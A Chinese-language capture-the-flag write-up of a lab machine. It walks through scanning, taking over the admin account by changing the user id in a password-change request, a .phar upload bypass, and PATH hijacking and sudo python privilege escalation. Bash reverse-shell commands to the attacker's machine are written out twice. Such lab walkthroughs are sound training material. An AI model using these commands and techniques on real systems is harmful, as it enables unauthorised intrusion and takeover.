0x001 信息收集
kali ip : 192.168.181.129
靶机 ip :192.168.181.141
首先进行ip扫描
对端口进行扫描
开启了22和80端口
发现端口进行探测没有漏洞可以利用,于是我打开网页
于是我进行查看源码
于是发现一个login.php的文件,这可能有提示
于是进行目录扫描
gobuster dir -u http://192.168.181.141/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x html,php,bak,txt
在http://192.168.181.141/upload/发现一张图片
于是下载到本地,一开始以为有隐写,尝试多次没有成功,后来还是打开login.php的页面
在login.php页面我可以进行注册并登录
0x002 网页渗透
于是我对修改密码的操作进行抓包,当我们看到id为7,那么我猜测1是不是就是admin用户呢
密码修改成功
于是使用admin进行登录
于是我上传php的文件
没有上传成功,于是我将其后缀改为‘.phar’
文件上传成功,将其运行,并在kali上使用netcat进行监听
于是进行外壳反弹
bash -c 'bash -i >& /dev/tcp/192.168.181.129/9999 0>&1'
于是在/home/john发现一个属组是www-data用户的
于是进行查看
于是我发现一个ssh密钥
于是在kali上生成ssh密钥
ssh-keygen -b 2048 -f key
于是在kali上打开http服务
python3 -m http.server 9999
并删除靶机上的密钥
于是将我们生成的密钥下载到目录下
于是我使用ssh进行登录john账号,但是没有成功
但是我发现export可以运行
cd /tmp
echo bash > id
chmod 777 id
export PATH=/tmp:$PATH
echo $PATH
cd /home/john
./toto
于是再次进行外壳反弹
bash -c 'bash -i >& /dev/tcp/192.168.181.129/5555 0>&1'
于是我查看了john的密码
于是进行ssh登录
于是获得第一个flag
0x003 提权
于是我对file.php进行编辑
于是运行file.php
sudo /usr/bin/python3 /home/john/file.py
上面说我们可以提权,于是我进行修改
再次运行file.py
于是获得最终flag